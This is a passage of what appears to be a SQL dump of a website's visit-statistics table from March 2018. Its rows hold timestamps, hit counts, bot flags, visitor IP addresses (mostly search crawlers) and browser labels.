5794,1,1,0,0,'54.36.148.209','other'),(225016,1521855880,1,1,0,0,'54.36.149.83','other'),(225017,1521856086,1,1,0,0,'52.87.30.80','other'),(225018,1521856260,1,1,0,0,'54.89.27.245','other'),(225019,1521856383,1,1,0,0,'8.29.198.26','other'),(225020,1521856409,1,1,0,0,'178.154.171.88','other'),(225021,1521856642,1,1,0,0,'54.36.148.174','other'),(225022,1521856728,1,1,0,0,'194.187.170.130','other'),(225023,1521856820,1,1,0,0,'54.36.148.58','other'),(225024,1521857005,1,1,0,0,'52.87.30.80','other'),(225025,1521857009,1,0,1,0,'66.249.69.143',''),(225026,1521857087,1,1,0,0,'54.36.148.39','other'),(225027,1521857428,1,1,0,0,'54.36.148.95','other'),(225028,1521857499,1,1,0,0,'80.252.154.233','chrome'),(225029,1521857512,1,1,0,0,'54.36.149.107','other'),(225030,1521857561,1,1,0,0,'54.89.27.245','other'),(225031,1521857662,3,3,0,0,'78.158.28.10','other'),(225032,1521857787,1,1,0,0,'180.76.15.161','other'),(225033,1521857895,6,6,0,0,'141.8.142.74','other'),(225034,1521857995,1,1,0,0,'54.36.148.214','other'),(225035,1521858047,1,1,0,0,'52.87.30.80','other'),(225036,1521858100,1,1,0,0,'54.36.148.75','other'),(225037,1521858404,1,1,0,0,'54.36.148.255','other'),(225038,1521858477,1,1,0,0,'54.89.27.245','other'),(225039,1521858491,1,1,0,0,'87.250.224.46','other'),(225040,1521858896,1,1,0,0,'54.36.148.58','other'),(225041,1521858901,1,1,0,0,'54.36.148.52','other'),(225042,1521858965,1,1,0,0,'52.87.30.80','other'),(225043,1521859256,1,1,0,0,'178.154.171.88','other'),(225044,1521859443,2,2,0,0,'54.89.27.245','other'),(225045,1521859873,1,1,0,0,'52.87.30.80','other'),(225046,1521859933,1,1,0,0,'54.36.149.79','other'),(225047,1521860090,1,1,0,0,'54.36.148.114','other'),(225048,1521860462,1,1,0,0,'54.36.149.49','other'),(225049,1521860826,1,1,0,0,'54.36.149.17','other'),(225050,1521860829,1,1,0,0,'52.87.30.80','other'),(225051,1521860834,1,1,0,0,'54.36.148.137','other'),(225052,1521860878,2,2,0,0,'54.89.27.245','other'),(225053,1521860990,1,1,0,0,'54.36.148.245','other'),(225054,1521861099,1,1,0,0,'54.36.148.108','other'),(225055,1521861342,1,1,0,0,'54.36.148.76','other'),(225056,1521861368,1,1,0,0,'54.36.148.127','other'),(225057,1521861453,1,1,0,0,'54.36.148.173','other'),(225058,1521861788,1,1,0,0,'52.87.30.80','other'),(225059,1521861811,1,0,1,0,'66.249.69.144',''),(225060,1521861825,1,1,0,0,'91.200.12.151','chrome'),(225061,1521861887,1,1,0,0,'54.36.149.47','other'),(225062,1521862059,1,1,0,0,'180.76.15.159','other'),(225063,1521862102,1,1,0,0,'178.154.171.88','other'),(225064,1521862111,1,1,0,0,'54.36.148.53','other'),(225065,1521862118,1,1,0,0,'54.89.27.245','other'),(225066,1521862174,1,1,0,0,'54.36.148.249','other'),(225067,1521862319,1,1,0,0,'54.36.148.116','other'),(225068,1521862558,1,1,0,0,'54.36.149.101','other'),(225069,1521862690,1,1,0,0,'54.36.148.107','other'),(225070,1521862697,1,1,0,0,'52.87.30.80','other'),(225071,1521862783,2,2,0,0,'54.165.59.7','other'),(225072,1521863201,1,1,0,0,'54.36.148.79','other'),(225073,1521863282,1,1,0,0,'54.36.149.53','other'),(225074,1521863322,1,1,0,0,'157.55.39.19','other'),(225075,1521863332,2,2,0,0,'54.89.27.245','other'),(225076,1521863605,1,1,0,0,'52.87.30.80','other'),(225077,1521863820,1,1,0,0,'54.36.149.52','other'),(225078,1521864309,1,1,0,0,'54.165.59.7','other'),(225079,1521864485,2,2,0,0,'54.89.27.245','other'),(225080,1521864511,1,1,0,0,'52.87.30.80','other'),(225081,1521864647,1,1,0,0,'91.229.77.33','firefox'),(225082,1521864793,1,1,0,0,'54.36.149.61','other'),(225083,1521865147,1,1,0,0,'54.36.149.86','other'),(225084,1521865185,1,1,0,0,'54.36.149.20','other'),(225085,1521865455,1,1,0,0,'52.87.30.80','other'),(225086,1521865573,2,2,0,0,'54.165.59.7','other'),(225087,1521865609,1,1,0,0,'54.89.27.245','other'),(225088,1521865916,3,3,0,0,'141.8.142.74','other'),(225089,1521865934,1,1,0,0,'54.36.148.250','other'),(225090,1521866021,1,1,0,0,'54.36.149.69','other'),(225091,1521866268,1,1,0,0,'54.36.149.83','other'),(225092,1521866372,1,1,0,0,'52.87.30.80','other'),(225093,1521866405,1,1,0,0,'54.36.149.66','other'),(225094,1521866466,1,1,0,0,'40.77.169.27','other'),(225095,1521866649,2,2,0,0,'54.89.27.245','other'),(225096,1521866932,1,1,0,0,'54.36.148.208','other'),(225097,1521867033,1,1,0,0,'54.36.148.243','other'),(225098,1521867215,1,1,0,0,'8.29.198.27','other'),(225099,1521867292,1,1,0,0,'52.87.30.80','other'),(225100,1521867406,1,1,0,0,'54.36.148.139','other'),(225101,1521867420,1,1,0,0,'54.36.148.189','other'),(225102,1521867554,3,3,0,0,'216.244.66.237','other'),(225103,1521867783,2,2,0,0,'54.89.27.245','other'),(225104,1521867921,1,1,0,0,'54.36.148.88','other'),(225105,1521868001,1,1,0,0,'54.36.149.107','other'),(225106,1521868036,1,1,0,0,'54.36.148.80','other'),(225107,1521868199,1,0,1,0,'66.249.69.143',''),(225108,1521868213,2,2,0,0,'52.87.30.80','other'),(225109,1521868335,1,1,0,0,'54.36.148.224','other'),(225110,1521868402,1,1,0,0,'54.36.148.22','other'),(225111,1521868558,1,1,0,0,'54.36.149.77','other'),(225112,1521868638,1,1,0,0,'54.36.148.218','other'),(225113,1521868735,1,1,0,0,'54.36.148.205','other'),(225114,1521868757,1,1,0,0,'54.89.27.245','other'),(225115,1521868786,1,1,0,0,'54.36.148.58','other'),(225116,1521869055,1,1,0,0,'178.154.171.88','other'),(225117,1521869132,1,1,0,0,'52.87.30.80','other'),(225118,1521869185,1,1,0,0,'54.36.148.125','other'),(225119,1521869225,2,2,0,0,'54.165.59.7','other'),(225120,1521869275,1,1,0,0,'54.36.148.195','other'),(225121,1521869285,1,1,0,0,'54.36.148.98','other'),(225122,1521869301,1,1,0,0,'54.36.149.8','other'),(225123,1521869513,678,678,0,0,'194.68.17.5','other'),(225124,1521869562,6,6,0,0,'173.212.253.47','other'),(225125,1521869708,2,2,0,0,'54.89.27.245','other'),(225126,1521869795,1,1,0,0,'54.36.149.39','other'),(225127,1521869931,1,1,0,0,'54.36.148.101','other'),(225128,1521869984,1,1,0,0,'54.36.148.37','other'),(225129,1521870057,1,1,0,0,'52.87.30.80','other'),(225130,1521870287,1,1,0,0,'54.36.148.182','other'),(225131,1521870414,115,115,0,0,'194.68.17.5','other'),(225132,1521870881,1,1,0,0,'40.77.167.72','other'),(225133,1521870977,1,1,0,0,'52.87.30.80','other'),(225134,1521871394,1,1,0,0,'54.36.148.109','other'),(225135,1521871448,1,1,0,0,'54.36.149.28','other'),(225136,1521871878,1,1,0,0,'54.36.148.33','other'),(225137,1521871882,1,1,0,0,'52.87.30.80','other'),(225138,1521872172,1,1,0,0,'216.244.66.237','other'),(225139,1521872299,1,1,0,0,'54.36.148.221','other'),(225140,1521872352,2,2,0,0,'91.124.239.184','other'),(225141,1521872397,1,1,0,0,'141.8.142.74','other'),(225142,1521872508,1,1,0,0,'54.36.148.144','other'),(225143,1521872515,1,1,0,0,'37.9.113.182','other'),(225144,1521872566,2,2,0,0,'37.73.228.214','other'),(225145,1521872651,1,1,0,0,'31.13.106.122','other'),(225146,1521872664,1,1,0,0,'54.36.149.39','other'),(225147,1521872801,1,1,0,0,'52.87.30.80','other'),(225148,1521873086,1,1,0,0,'178.154.171.88','other'),(225149,1521873242,1,1,0,0,'91.196.178.53','chrome'),(225150,1521873444,1,1,0,0,'54.36.149.107','other'),(225151,1521873610,1,1,0,0,'54.36.148.247','other'),(225152,1521873651,1,1,0,0,'54.36.148.171','other'),(225153,1521873714,1,1,0,0,'52.87.30.80','other'),(225154,1521873740,1,1,0,0,'54.36.149.97','other'),(225155,1521873750,2,2,0,0,'213.179.252.111','chrome'),(225156,1521873770,2,2,0,0,'91.196.178.35','chrome'),(225157,1521873923,1,1,0,0,'216.244.66.237','other'),(225158,1521874153,1,1,0,0,'91.196.178.53','chrome'),(225159,1521874257,1,1,0,0,'54.36.148.39','other'),(225160,1521874366,1,1,0,0,'178.154.200.41','other'),(225161,1521874372,2,2,0,0,'178.154.171.88','other'),(225162,1521874378,9,9,0,0,'141.8.142.74','other'),(225163,1521874388,1,1,0,0,'37.9.113.182','other'),(225164,1521874496,1,1,0,0,'54.36.148.90','other'),(225165,1521874643,1,1,0,0,'52.87.30.80','other'),(225166,1521874655,1,0,1,0,'66.249.69.144',''),(225167,1521874883,1,1,0,0,'54.36.148.167','other'),(225168,1521874992,3,3,0,0,'213.179.252.111','chrome'),(225169,1521875137,1,1,0,0,'54.36.148.190','other'),(225170,1521875232,1,1,0,0,'54.36.148.29','other'),(225171,1521875283,1,1,0,0,'54.36.148.161','other'),(225172,1521875336,1,1,0,0,'54.89.27.245','other'),(225173,1521875448,1,1,0,0,'54.36.148.224','other'),(225174,1521875548,1,1,0,0,'207.46.13.34','other'),(225175,1521875561,1,1,0,0,'52.87.30.80','other'),(225176,1521876472,1,0,1,0,'66.249.69.145',''),(225177,1521876544,1,1,0,0,'52.87.30.80','other'),(225178,1521876572,1,1,0,0,'54.36.149.52','other'),(225179,1521876595,1,1,0,0,'54.36.149.0','other'),(225180,1521876608,2,2,0,0,'54.89.27.245','other'),(225181,1521876825,1,1,0,0,'216.244.66.237','other'),(225182,1521876858,1,1,0,0,'54.36.148.53','other'),(225183,1521877251,1,1,0,0,'54.36.148.202','other'),(225184,1521877471,1,1,0,0,'52.87.30.80','other'),(225185,1521877794,1,1,0,0,'54.89.27.245','other'),(225186,1521877946,1,1,0,0,'54.36.148.75','other'),(225187,1521878006,1,1,0,0,'54.36.148.166','other'),(225188,1521878046,1,1,0,0,'8.29.198.27','other'),(225189,1521878100,1,1,0,0,'107.167.109.140','other'),(225190,1521878269,1,1,0,0,'54.36.148.209','other'),(225191,1521878312,1,1,0,0,'54.36.149.98','other'),(225192,1521878392,1,1,0,0,'52.87.30.80','other'),(225193,1521878450,1,1,0,0,'54.36.148.183','other'),(225194,1521878678,1,1,0,0,'54.36.148.15','other'),(225195,1521878735,1,1,0,0,'54.36.149.66','other'),(225196,1521878885,1,0,1,0,'66.249.69.144',''),(225197,1521878961,1,1,0,0,'216.244.66.237','other'),(225198,1521879119,1,1,0,0,'54.36.148.136','other'),(225199,1521879310,1,1,0,0,'52.87.30.80','other'),(225200,1521879472,2,2,0,0,'54.89.27.245','other'),(225201,1521879474,2,2,0,0,'95.213.141.126','opera'),(225202,1521879545,1,1,0,0,'54.36.149.25','other'),(225203,1521879763,1,1,0,0,'54.36.148.241','other'),(225204,1521879984,2,2,0,0,'213.179.252.111','chrome'),(225205,1521880050,1,1,0,0,'66.249.93.205','chrome'),(225206,1521880214,1,1,0,0,'54.36.148.116','other'),(225207,1521880239,1,1,0,0,'52.87.30.80','other'),(225208,1521880487,1,1,0,0,'54.36.148.176','other'),(225209,1521880568,1,1,0,0,'54.36.148.150','other'),(225210,1521880570,1,1,0,0,'54.36.148.215','other'),(225211,1521880844,1,1,0,0,'54.36.148.129','other'),(225212,1521881009,1,1,0,0,'54.36.149.26','other'),(225213,1521881118,1,1,0,0,'54.89.27.245','other'),(225214,1521881153,1,1,0,0,'54.36.149.106','other'),(225215,1521881156,1,1,0,0,'52.87.30.80','other'),(225216,1521881166,1,1,0,0,'54.36.148.79','other'),(225217,1521881393,2,2,0,0,'216.244.66.237','other'),(225218,1521881413,1,0,1,0,'66.249.69.143',''),(225219,1521881423,1,1,0,0,'54.36.148.53','other'),(225220,1521881561,1,1,0,0,'54.36.148.254','other'),(225221,1521881575,1,1,0,0,'54.36.149.41','other'),(225222,1521881665,1,1,0,0,'37.9.113.182','other'),(225223,1521882048,2,2,0,0,'54.89.27.245','other'),(225224,1521882115,1,1,0,0,'52.87.30.80','other'),(225225,1521882330,1,1,0,0,'54.36.148.218','other'),(225226,1521882592,1,1,0,0,'54.36.148.42','other'),(225227,1521883034,1,1,0,0,'52.87.30.80','other'),(225228,1521883430,1,1,0,0,'54.36.149.6','other'),(225229,1521883685,1,1,0,0,'54.89.27.245','other'),(225230,1521883828,5,5,0,0,'178.154.171.88','other'),(225231,1521883833,9,9,0,0,'141.8.142.74','other'),(225232,1521883839,2,2,0,0,'37.54.114.62','chrome'),(225233,1521883852,1,1,0,0,'141.8.142.167','other'),(225234,1521883864,3,3,0,0,'87.250.224.46','other'),(225235,1521883953,1,1,0,0,'52.87.30.80','other'),(225236,1521884164,1,1,0,0,'54.36.148.167','other'),(225237,1521884350,1,1,0,0,'91.196.178.48','chrome'),(225238,1521884367,1,1,0,0,'54.36.148.240','other'),(225239,1521884652,1,1,0,0,'54.89.27.245','other'),(225240,1521884844,1,1,0,0,'54.36.148.211','other'),(225241,1521884863,1,1,0,0,'52.87.30.80','other'),(225242,1521885360,1,1,0,0,'54.36.148.62','other'),(225243,1521885383,1,1,0,0,'54.36.148.105','other'),(225244,1521885657,1,1,0,0,'54.89.27.245','other'),(225245,1521885706,1,1,0,0,'54.36.148.104','other'),(225246,1521885753,1,1,0,0,'54.36.148.154','other'),(225247,1521885777,1,1,0,0,'52.87.30.80','other'),(225248,1521886364,1,1,0,0,'54.36.149.53','other'),(225249,1521886430,1,1,0,0,'54.36.148.187','other'),(225250,1521886612,2,2,0,0,'46.201.135.109','chrome'),(225251,1521886667,1,1,0,0,'54.89.27.245','other'),(225252,1521886698,1,1,0,0,'52.87.30.80','other'),(225253,1521886786,1,1,0,0,'54.36.149.63','other'),(225254,1521886869,1,1,0,0,'54.36.148.184','other'),(225255,1521886989,1,1,0,0,'54.36.148.31','other'),(225256,1521887330,1,1,0,0,'54.36.149.19','other'),(225257,1521887614,2,2,0,0,'216.244.66.237','other'),(225258,1521887616,1,1,0,0,'141.8.142.74','other'),(225259,1521887648,1,1,0,0,'52.87.30.80','other'),(225260,1521887671,1,1,0,0,'54.36.148.197','other'),(225261,1521887744,2,2,0,0,'178.154.171.88','other'),(225262,1521887808,2,2,0,0,'213.179.252.111','chrome'),(225263,1521887911,1,1,0,0,'54.89.27.245','other'),(225264,1521887930,1,1,0,0,'54.36.148.215','other'),(225265,1521887996,1,1,0,0,'54.36.148.106','other'),(225266,1521888419,1,1,0,0,'109.86.71.21','chrome'),(225267,1521888567,1,1,0,0,'52.87.30.80','other'),(225268,1521888742,1,1,0,0,'54.36.148.48','other'),(225269,1521888842,1,1,0,0,'54.36.149.102','other'),(225271,1521888847,1,1,0,0,'54.36.148.177','other'),(225272,1521888885,1,1,0,0,'8.29.198.26','other'),(225273,1521889190,1,1,0,0,'54.36.148.182','other'),(225274,1521889285,1,1,0,0,'54.89.27.245','other'),(225275,1521889469,1,1,0,0,'52.87.30.80','other'),(225276,1521889751,1,1,0,0,'54.36.148.54','other'),(225277,1521889878,1,1,0,0,'54.36.148.249','other'),(225278,1521889992,2,2,0,0,'141.8.142.50','other'),(225279,1521890103,2,2,0,0,'141.8.142.96','other'),(225280,1521890109,1,1,0,0,'141.8.142.123','other'),(225281,1521890120,1,1,0,0,'87.250.224.77','other'),(225282,1521890126,2,2,0,0,'37.9.113.115','other'),(225283,1521890135,1,1,0,0,'178.154.171.10','other'),(225284,1521890148,1,1,0,0,'141.8.142.167','other'),(225285,1521890149,1,1,0,0,'87.250.224.125','other'),(225286,1521890157,2,2,0,0,'178.154.171.81','other'),(225287,1521890165,3,3,0,0,'37.9.113.110','other'),(225288,1521890188,1,1,0,0,'37.9.113.101','other'),(225289,1521890191,1,1,0,0,'37.9.113.134','other'),(225290,1521890202,1,1,0,0,'37.9.113.157','other'),(225291,1521890204,1,1,0,0,'87.250.224.85','other'),(225292,1521890208,1,1,0,0,'178.154.171.4','other'),(225293,1521890210,1,1,0,0,'95.108.213.24','other'),(225294,1521890214,2,2,0,0,'178.154.171.24','other'),(225295,1521890217,1,1,0,0,'37.9.113.100','other'),(225296,1521890227,1,1,0,0,'178.154.200.59','other'),(225297,1521890242,1,1,0,0,'37.9.113.60','other'),(225298,1521890381,1,1,0,0,'91.196.178.48','chrome'),(225299,1521890392,1,1,0,0,'52.87.30.80','other'),(225300,1521890394,1,1,0,0,'46.201.135.109','chrome'),(225301,1521890475,1,1,0,0,'54.36.149.16','other'),(225302,1521890478,1,1,0,0,'54.36.148.28','other'),(225303,1521890551,1,1,0,0,'37.54.114.62','chrome'),(225304,1521890574,1,1,0,0,'54.89.27.245','other'),(225305,1521890623,1,1,0,0,'54.36.148.118','other'),(225306,1521890640,1,1,0,0,'54.36.148.116','other'),(225307,1521890932,1,1,0,0,'54.36.148.124','other'),(225308,1521890983,15,15,0,0,'167.114.1.124','other'),(225309,1521891193,1,1,0,0,'178.154.171.88','other'),(225310,1521891236,1,1,0,0,'54.36.148.252','other'),(225311,1521891299,1,1,0,0,'52.87.30.80','other'),(225312,1521891541,1,1,0,0,'141.8.142.74','other'),(225313,1521891601,1,1,0,0,'54.36.149.25','other'),(225314,1521891669,1,1,0,0,'54.36.148.110','other'),(225315,1521891731,1,1,0,0,'54.36.149.21','other'),(225316,1521891819,1,1,0,0,'54.36.149.64','other'),(225317,1521891869,1,1,0,0,'216.244.66.246','other'),(225318,1521891964,1,1,0,0,'54.36.148.28','other'),(225319,1521892013,1,1,0,0,'54.36.148.76','other'),(225320,1521892045,1,1,0,0,'54.89.27.245','other'),(225321,1521892199,1,1,0,0,'54.36.148.246','other'),(225322,1521892217,1,1,0,0,'52.87.30.80','other'),(225323,1521892300,1,1,0,0,'216.244.66.237','other'),(225324,1521892677,1,1,0,0,'54.36.148.185','other'),(225325,1521892825,1,1,0,0,'54.36.148.197','other'),(225326,1521892990,1,1,0,0,'54.36.148.99','other'),(225327,1521893128,2,2,0,0,'91.196.178.168','chrome'),(225328,1521893130,1,1,0,0,'52.87.30.80','other'),(225329,1521893173,1,1,0,0,'46.211.69.183','chrome'),(225330,1521893336,1,1,0,0,'5.45.207.49','other'),(225331,1521893476,1,0,1,0,'66.249.64.29',''),(225332,1521893601,1,1,0,0,'141.8.142.74','other'),(225333,1521893802,1,1,0,0,'54.36.148.133','other'),(225334,1521893846,1,1,0,0,'54.89.27.245','other'),(225335,1521894056,1,1,0,0,'52.87.30.80','other'),(225336,1521894256,1,1,0,0,'54.36.148.103','other'),(225337,1521894428,1,1,0,0,'54.36.149.94','other'),(225338,1521894435,1,1,0,0,'54.36.148.206','other'),(225339,1521894890,1,1,0,0,'54.36.148.75','other'),(225340,1521894974,1,1,0,0,'52.87.30.80','other'),(225341,1521895250,1,1,0,0,'37.9.113.182','other'),(225342,1521895254,2,2,0,0,'178.154.171.88','other'),(225343,1521895424,3,3,0,0,'216.244.66.237','other'),(225344,1521895827,1,1,0,0,'54.36.148.107','other'),(225345,1521895853,2,2,0,0,'146.185.185.122','chrome'),(225346,1521895892,1,1,0,0,'52.87.30.80','other'),(225347,1521896067,1,1,0,0,'54.36.149.70','other'),(225348,1521896221,1,1,0,0,'87.250.224.46','other'),(225349,1521896301,1,1,0,0,'54.36.148.76','other'),(225350,1521896336,1,1,0,0,'54.36.148.240','other'),(225351,1521896363,1,1,0,0,'54.36.148.51','other'),(225352,1521896739,1,1,0,0,'54.36.148.111','other'),(225353,1521896771,1,1,0,0,'54.36.149.93','other'),(225354,1521896822,1,1,0,0,'52.87.30.80','other'),(225355,1521896886,1,1,0,0,'54.36.148.90','other'),(225356,1521897388,2,2,0,0,'213.179.252.111','chrome'),(225357,1521897485,4,4,0,0,'46.4.87.205','other'),(225358,1521897558,1,1,0,0,'54.36.148.129','other'),(225359,1521897742,1,1,0,0,'52.87.30.80','other'),(225360,1521898048,1,1,0,0,'54.36.148.163','other'),(225361,1521898269,1,1,0,0,'54.36.148.57','other'),(225362,1521898396,1,1,0,0,'87.250.224.46','other'),(225363,1521898471,1,1,0,0,'54.89.27.245','other'),(225364,1521898567,1,1,0,0,'54.36.148.27','other'),(225365,1521898647,1,1,0,0,'52.87.30.80','other'),(225366,1521898956,1,1,0,0,'54.36.149.31','other'),(225367,1521899116,1,1,0,0,'54.36.148.150','other'),(225368,1521899174,1,1,0,0,'54.36.149.26','other'),(225369,1521899376,1,1,0,0,'54.36.148.107','other'),(225370,1521899484,1,1,0,0,'54.36.149.41','other'),(225371,1521899510,1,1,0,0,'87.250.224.46','other'),(225372,1521899718,1,1,0,0,'8.29.198.25','other'),(225373,1521899807,1,1,0,0,'52.87.30.80','other'),(225374,1521899890,2,2,0,0,'213.179.252.111','chrome'),(225375,1521900035,1,1,0,0,'54.36.148.20','other'),(225376,1521900040,1,1,0,0,'54.36.148.245','other'),(225377,1521900056,1,1,0,0,'54.36.148.242','other'),(225378,1521900138,1,1,0,0,'216.244.66.237','other'),(225379,1521900208,3,3,0,0,'141.8.142.74','other'),(225380,1521900714,1,1,0,0,'52.87.30.80','other'),(225381,1521900766,1,1,0,0,'54.36.148.101','other'),(225382,1521900841,1,1,0,0,'54.36.148.63','other'),(225383,1521901096,1,1,0,0,'40.77.169.27','other'),(225384,1521901154,1,1,0,0,'54.36.149.33','other'),(225385,1521901207,1,1,0,0,'54.89.27.245','other'),(225386,1521901362,1,1,0,0,'54.36.148.123','other'),(225387,1521901372,2,2,0,0,'91.196.178.161','chrome'),(225388,1521901450,2,2,0,0,'141.8.142.74','other'),(225389,1521901462,1,1,0,0,'54.36.149.60','other'),(225390,1521901614,1,1,0,0,'54.36.148.143','other'),(225391,1521901652,1,1,0,0,'178.154.200.41','other'),(225392,1521901767,1,1,0,0,'52.87.30.80','other'),(225393,1521901957,1,1,0,0,'54.36.148.129','other'),(225394,1521902377,1,1,0,0,'54.36.148.94','other'),(225395,1521902681,1,1,0,0,'52.87.30.80','other'),(225396,1521902854,1,1,0,0,'91.196.178.53','chrome'),(225397,1521902902,2,2,0,0,'141.8.142.74','other'),(225398,1521903100,1,1,0,0,'54.36.149.90','other'),(225399,1521903115,1,1,0,0,'54.36.148.144','other'),(225400,1521903529,1,1,0,0,'54.36.149.12','other'),(225401,1521903581,1,1,0,0,'54.36.148.188','other'),(225402,1521903606,1,1,0,0,'52.87.30.80','other'),(225403,1521903726,1,1,0,0,'54.36.148.235','other'),(225404,1521903846,1,1,0,0,'54.36.148.106','other'),(225405,1521904019,1,1,0,0,'54.36.148.76','other'),(225406,1521904507,1,1,0,0,'52.87.30.80','other'),(225407,1521904731,1,1,0,0,'54.89.27.245','other'),(225408,1521904944,1,1,0,0,'54.36.148.207','other'),(225409,1521905329,1,1,0,0,'141.8.142.74','other'),(225410,1521905348,1,1,0,0,'216.244.66.237','other'),(225411,1521905435,1,1,0,0,'52.87.30.80','other'),(225412,1521905798,1,1,0,0,'54.36.148.202','other'),(225413,1521906103,1,1,0,0,'207.244.149.26','chrome'),(225414,1521906327,1,1,0,0,'54.36.149.43','other'),(225415,1521906351,1,1,0,0,'54.36.148.61','other'),(225416,1521906375,1,1,0,0,'52.87.30.80','other'),(225417,1521906421,1,1,0,0,'54.36.148.42','other'),(225418,1521906554,1,1,0,0,'87.250.224.46','other'),(225419,1521906595,1,1,0,0,'54.36.148.10','other'),(225420,1521906603,1,1,0,0,'178.154.171.88','other'),(225421,1521906649,1,1,0,0,'54.36.148.186','other'),(225422,1521906725,2,2,0,0,'91.196.178.168','chrome'),(225423,1521906966,1,1,0,0,'54.36.149.46','other'),(225424,1521907198,1,1,0,0,'54.36.149.39','other'),(225425,1521907247,2,2,0,0,'216.244.66.237','other'),(225426,1521907315,1,1,0,0,'52.87.30.80','other'),(225427,1521908123,1,1,0,0,'178.154.171.88','other'),(225428,1521908158,1,1,0,0,'54.36.148.246','other'),(225429,1521908229,1,1,0,0,'54.36.148.188','other'),(225430,1521908477,1,1,0,0,'216.244.66.237','other'),(225431,1521909001,1,1,0,0,'52.87.30.80','other'),(225432,1521909458,2,2,0,0,'141.8.142.74','other'),(225433,1521909631,3,3,0,0,'178.154.171.88','other'),(225434,1521909762,1,1,0,0,'54.36.149.49','other'),(225435,1521909920,1,1,0,0,'52.87.30.80','other'),(225436,1521910036,1,1,0,0,'54.89.27.245','other'),(225437,1521910059,2,2,0,0,'213.179.252.111','chrome'),(225438,1521910394,1,1,0,0,'54.36.148.177','other'),(225439,1521910421,1,0,1,0,'66.249.64.30',''),(225440,1521910479,3,0,3,0,'66.249.64.28',''),(225441,1521910558,1,1,0,0,'8.29.198.26','other'),(225442,1521910565,1,1,0,0,'91.196.178.167','chrome'),(225443,1521910592,1,1,0,0,'54.36.148.75','other'),(225444,1521911084,1,1,0,0,'54.36.148.212','other'),(225445,1521911098,1,1,0,0,'141.8.142.74','other'),(225446,1521911129,1,1,0,0,'54.36.148.80','other'),(225447,1521911264,1,1,0,0,'54.36.149.76','other'),(225448,1521911518,1,1,0,0,'91.196.178.16','chrome'),(225449,1521911548,1,1,0,0,'87.250.224.46','other'),(225450,1521912132,2,2,0,0,'141.8.142.74','other'),(225451,1521912243,1,1,0,0,'54.36.149.69','other'),(225452,1521912244,1,1,0,0,'37.9.113.157','other'),(225453,1521912367,3,3,0,0,'91.196.178.38','chrome'),(225454,1521912546,1,1,0,0,'35.226.23.240','other'),(225455,1521912582,1,1,0,0,'5.45.207.82','other'),(225456,1521912784,1,0,1,0,'66.249.64.29',''),(225457,1521913010,3,3,0,0,'178.154.171.88','other'),(225458,1521913054,1,1,0,0,'54.36.148.160','other'),(225459,1521913062,2,2,0,0,'213.179.252.111','chrome'),(225460,1521913158,1,1,0,0,'54.36.148.240','other'),(225461,1521913234,2,2,0,0,'52.87.30.80','other'),(225462,1521913240,1,1,0,0,'95.135.89.216','chrome'),(225463,1521913342,1,1,0,0,'91.196.178.38','chrome'),(225464,1521913525,1,1,0,0,'54.36.148.48','other'),(225465,1521913558,1,1,0,0,'54.36.148.153','other'),(225466,1521913585,4,4,0,0,'141.8.142.74','other'),(225467,1521913744,2,2,0,0,'40.77.167.72','other'),(225468,1521913765,1,1,0,0,'87.250.224.46','other'),(225469,1521914008,2,2,0,0,'178.154.171.88','other'),(225470,1521914138,1,1,0,0,'52.87.30.80','other'),(225471,1521914780,1,1,0,0,'54.36.148.26','other'),(225472,1521915068,1,1,0,0,'52.87.30.80','other'),(225473,1521915147,1,1,0,0,'141.8.142.74','other'),(225474,1521915446,1,1,0,0,'91.196.178.50','chrome'),(225475,1521915472,1,1,0,0,'54.36.148.115','other'),(225476,1521915489,1,1,0,0,'54.36.148.247','other'),(225477,1521915507,1,1,0,0,'91.232.158.8','chrome'),(225478,1521915661,1,1,0,0,'87.250.224.46','other'),(225479,1521915991,1,1,0,0,'52.87.30.80','other'),(225480,1521916131,1,1,0,0,'54.36.149.19','other'),(225481,1521916502,1,0,1,0,'66.249.64.29',''),(225482,1521916645,2,2,0,0,'141.8.142.74','other'),(225483,1521916883,1,1,0,0,'54.36.149.100','other'),(225484,1521916918,1,1,0,0,'52.87.30.80','other'),(225485,1521917435,1,1,0,0,'54.36.148.235','other'),(225486,1521917490,1,1,0,0,'54.208.102.37','other'),(225487,1521917533,1,1,0,0,'54.36.148.19','other'),(225488,1521917621,2,2,0,0,'46.211.121.139','chrome'),(225489,1521917820,1,1,0,0,'52.87.30.80','other'),(225490,1521917901,2,2,0,0,'178.154.171.88','other'),(225491,1521918195,1,1,0,0,'54.36.148.131','other'),(225492,1521918271,1,1,0,0,'54.36.149.70','other'),(225493,1521918577,1,0,1,0,'66.249.64.29',''),(225494,1521918641,1,1,0,0,'54.36.149.47','other'),(225495,1521918725,1,1,0,0,'52.87.30.80','other'),(225496,1521918932,1,1,0,0,'87.250.224.46','other'),(225497,1521918991,1,0,1,0,'66.249.64.28',''),(225498,1521919191,1,1,0,0,'54.36.148.245','other'),(225499,1521919656,1,1,0,0,'178.154.171.88','other'),(225500,1521919761,1,1,0,0,'54.89.27.245','other'),(225501,1521919884,1,1,0,0,'54.36.148.128','other'),(225502,1521920341,5,5,0,0,'188.166.38.192','other'),(225503,1521920618,1,1,0,0,'54.36.148.189','other'),(225504,1521920714,1,1,0,0,'54.36.148.129','other'),(225505,1521920739,1,1,0,0,'91.196.178.53','chrome'),(225506,1521920740,2,2,0,0,'141.8.142.74','other'),(225507,1521920798,1,1,0,0,'54.36.149.80','other'),(225508,1521920968,1,1,0,0,'54.36.149.19','other'),(225509,1521921075,2,2,0,0,'213.179.252.111','chrome'),(225510,1521921144,1,1,0,0,'91.196.178.89','firefox'),(225511,1521921242,40,40,0,0,'5.9.88.103','other'),(225512,1521921277,1,1,0,0,'54.36.148.79','other'),(225513,1521921393,1,1,0,0,'8.29.198.27','other'),(225514,1521921418,1,1,0,0,'54.36.148.95','other'),(225515,1521921508,1,1,0,0,'54.36.148.54','other'),(225516,1521921615,1,1,0,0,'178.154.171.88','other'),(225517,1521922263,1,1,0,0,'216.244.66.237','other'),(225518,1521922430,3,3,0,0,'141.8.142.74','other'),(225519,1521922531,1,1,0,0,'54.36.148.73','other'),(225520,1521922766,1,1,0,0,'54.36.148.181','other'),(225521,1521923705,1,1,0,0,'87.250.224.46','other'),(225522,1521923911,2,2,0,0,'216.244.66.237','other'),(225523,1521923966,1,1,0,0,'54.36.149.96','other'),(225524,1521923967,1,1,0,0,'54.36.148.103','other'),(225525,1521924037,1,1,0,0,'54.36.148.122','other'),(225526,1521924061,1,1,0,0,'54.36.149.87','other'),(225527,1521924486,1,1,0,0,'178.154.171.88','other'),(225528,1521924588,1,1,0,0,'54.36.148.144','other'),(225529,1521924710,1,1,0,0,'87.250.224.46','other'),(225530,1521925381,1,1,0,0,'54.36.149.59','other'),(225531,